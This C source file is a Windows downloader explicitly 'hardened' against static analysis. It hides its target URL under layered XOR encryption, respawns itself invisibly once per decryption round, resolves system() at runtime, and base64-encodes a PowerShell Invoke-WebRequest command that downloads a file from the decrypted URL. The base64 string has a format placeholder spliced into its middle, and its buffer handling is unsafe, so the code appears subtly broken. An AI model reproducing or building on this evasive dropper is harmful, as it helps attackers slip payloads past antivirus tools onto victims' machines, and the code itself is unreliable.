// onion.c — STATIC ANALYSIS HARDENED VERSION
// Assumes keys.h and encrypted_url.h were generated by encrypt_url.py

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <windows.h>

#include "keys.h"
#include "encrypted_url.h"

#define URL_LEN 34
#define KEY_LEN 31
#define ROUNDS (sizeof(keys) / sizeof(keys[0]))
#define MAX_PATH_LEN 260

int get_depth() {
    char *env = getenv("RECURSIVE_DEPTH");
    return env ? atoi(env) : 0;
}

void xor_decrypt(uint8_t *data, size_t data_len, const uint8_t *key, size_t key_len) {
    for (size_t i = 0; i < data_len; i++) {
        data[i] ^= key[i % key_len];
    }
}

void spawn_next(int next_depth, char *prog_path) {
    char env_val[16];
    snprintf(env_val, sizeof(env_val), "%d", next_depth);
    SetEnvironmentVariableA("RECURSIVE_DEPTH", env_val);

    STARTUPINFOA si = { sizeof(si) };
    PROCESS_INFORMATION pi;

    if (CreateProcessA(NULL, prog_path, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) {
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }
}

void run_powershell_download(const char *url) {
    HMODULE msvcrt = LoadLibraryA("msvcrt.dll");
    if (!msvcrt) return;
    int (*dyn_system)(const char *) = (int (*)(const char *))GetProcAddress(msvcrt, "system");
    if (!dyn_system) return;

    const char *encoded = "cG93ZXJzaGVsbCAtQ29tbWFuZCAiSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAn%sJyAtT3V0RmlsZSAnZWljYXIuY29tJyI=";

    char decoded[512];
    DWORD decoded_len = sizeof(decoded);

    HMODULE crypt32 = LoadLibraryA("crypt32.dll");
    if (!crypt32) return;

    BOOL (*CryptStringToBinaryA_fn)(LPCSTR, DWORD, DWORD, BYTE*, DWORD*, DWORD*, DWORD*) =
        (BOOL (*)(LPCSTR, DWORD, DWORD, BYTE*, DWORD*, DWORD*, DWORD*))GetProcAddress(crypt32, "CryptStringToBinaryA");
    if (!CryptStringToBinaryA_fn) return;

    if (!CryptStringToBinaryA_fn(encoded, 0, 1, (BYTE*)decoded, &decoded_len, NULL, NULL)) return;

    decoded[decoded_len] = '\0';

    char final_cmd[600];
    snprintf(final_cmd, sizeof(final_cmd), decoded, url);
    dyn_system(final_cmd);

    FreeLibrary(crypt32);
    FreeLibrary(msvcrt);
}


int main() {
    int depth = get_depth();
    if (depth >= ROUNDS) return 0;

    uint8_t decrypted[URL_LEN];
    memcpy(decrypted, encrypted_url, URL_LEN);
    for (int i = 0; i <= depth; i++) {
        xor_decrypt(decrypted, URL_LEN, keys[i], KEY_LEN);
    }

    if (depth == ROUNDS - 1) {
        char output[URL_LEN + 1];
        memcpy(output, decrypted, URL_LEN);
        output[URL_LEN] = '\0';
        run_powershell_download(output);
    } else {
        char prog_path[MAX_PATH_LEN];
        GetModuleFileNameA(NULL, prog_path, MAX_PATH_LEN);
        spawn_next(depth + 1, prog_path);
    }
    return 0;
}
